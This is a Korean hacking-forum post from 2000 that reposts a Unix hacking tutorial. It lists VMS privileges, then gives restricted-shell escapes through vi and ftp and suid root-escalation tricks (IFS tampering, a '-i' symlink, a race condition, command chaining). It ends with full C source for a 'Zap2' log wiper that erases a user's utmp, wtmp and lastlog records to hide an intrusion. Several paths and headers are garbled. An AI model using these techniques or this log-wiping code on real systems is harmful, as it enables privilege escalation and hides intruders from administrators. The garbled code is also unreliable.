Hacking 관련 게시판

Hacking 관련 게시판

2000/08/06(21:33) from 203.255.160.61
작성자 : 강줄기 (jkkang65@hanmail.net)	조회수 : 4422 , 줄수 : 356

[강좌] 유닉스에서 해킹하기 - [2] 퍼온글

VMS에서의 권한은 어떤 것이 있나?

ACNT Allows you to restrain accounting messages

ALLSPOOL Allows you to allocate spooled devices

ALTPRI Allot Priority. This allows you to set any priority

value

BUGCHK Allows you make bug check error log entries

BYPASS Enables you to disregard protections

CMEXEC/

CMKRNL Change to executive or kernel mode. These privileges

allow a process to execute optional routines with KERNEL

and EXECUTIVE access modes. CMKRNL is the most powerful

privilege on VMS as anything protected can be accessed

if you have this privilege. You must have these

privileges to gain access to the kernel data structures

directly.

DETACH This privilege allow you to create detached processes of

arbitrary UICs

DIAGNOSE With this privilege you can diagnose devices

EXQUOTA Allows you to exceed your disk quota

GROUP This privilege grants you permission to affect other

processes in the same rank

GRPNAM Allows you to insert group logical names into the group

logical names table.

GRPPRV Enables you to access system group objects through

system protection field

LOG_IO Allows you to issue logical input output requests

MOUNT May execute the mount function

NETMBX Allows you to create network connections

OPER Allows you to perform operator functions

PFNMAP Allows you to map to specific physical pages

PHY_IO Allows you to perform physical input output requests

PRMCEB Can create permanent common event clusters

PRMGBL Allows you to create permanent global sections

PRMMBX Allows you to create permanent mailboxes

PSWAPM Allows you to change a processes swap mode

READALL Allows you read access to everything

SECURITY Enables you to perform security related functions

SETPRV Enable all privileges

SHARE Allows you to access devices allocated to other users.

This is used to assign system mailboxes.

SHMEM Enables you to modify objects in shared memory

SYSGBL Allows you to create system wide permanent global

sections

SYSLCK Allows you to lock system wide resources

SYSNAM Allows you to insert in system logical names in the

names table.

SYSPRV If a process holds this privilege then it is the same as

a process holding the system user identification code.

TMPMBX Allows you create temporary mailboxes

VOLPRO Enables you to override volume protection

WORLD When this is set you can affect other processes in the

world

프로세스가 어떤 권한으로 수행하고 있는지 알기 위해서 다음과 같은 명령을
사용한다.

$ show /proc/priv

제한된 쉘에서 어떻게 빠져 나오나?

잘못 작성한 제한 쉘에서는 쉘에서 사용하는 기능을 가진 프로그램을 수행함으
로서 빠져나올 수 있다. 좋은 예가 vi이다. vi를 수행할 때 다음과 같은 명령
을 이용하라.

:set shell=/bikn/sh

그리고 나서 다으모가 같은 명령을 이용하여 쉘을 얻는다.

: shell

제한 쉘에서 "cd" 명령을 사용할 수 없도록 한다면 그 계정으로 ftp를 하면
cd를 할 수 있다.

suid 스크립트나 프로그램에서 어떻게 root의 권한을 얻을 수 있나?

1. 프로그램에서 system()을 이용하여 다른 프로그램을 부른다.면, IFS를 변
경하여 그 프로그램을 우롱할 수 있다. IFS는 내부 필드 구분자(Internal
Field Separator)의 약자로서 쉘에서 인수를 구분하는 문자로서 사용하는 것
이다.

프로그램에 다음과 같은 것이 포함된다고 하자.

system("bin/data")

그리고 IFS를 '/'로 변경하면 쉘은 명령을 다음과 같이 번역한다.

bin date

이제, 프로그램 중에 bin이라는 것이 경로(path)중에 있다면, suid 프로그램
은 /bin/date 프로그램 대신 bin이라는 프로그램을 수행하게 된다.

IFS를 바꾸기 위해서, 다음과 같은 명령을 이용한다.

IFS='/'; export IFS

setenv IFS '/'

export IFS='/'

2. 스크립트를 -i로 연결(link)한다.

"-i"라는 프로그램을 만들어 심볼릭 링크(symbolic link)를 만든다. "-i"를
수행하면 쉘(/bin/sh)이 상호작용(interactive) 모드가 되게 한다. 이 방법
은 suid(set uid)되어 있는 스크립트에서만 사용가능하다.

예:

% ln suid.sh -i

% -i

#

3. 경쟁 조건을 이용한다.

커널에서 /bin/sh를 로드할 때 다른 프로그램으로 프로그램에 대한 심볼릭 링
크를 바꾼다.

예:

nice -19 suidprog; ln -s evilprog suidroot

4. 프로그램에 잘못된 입력을 보낸다.

프로그램과 다른 명령을 한 커맨드 라인에서 수행한다.

예:

suidprog; id

시스템 로그에서 내 존재를 없애는 방법은?

/etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들
은 텍스트 파일이 아니라서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그
램을 작성해야 한다.

예:

#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}

void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}

void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}

} else printf("%s: ?n",who);

}

main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!n");

} else

printf("Error.n");

}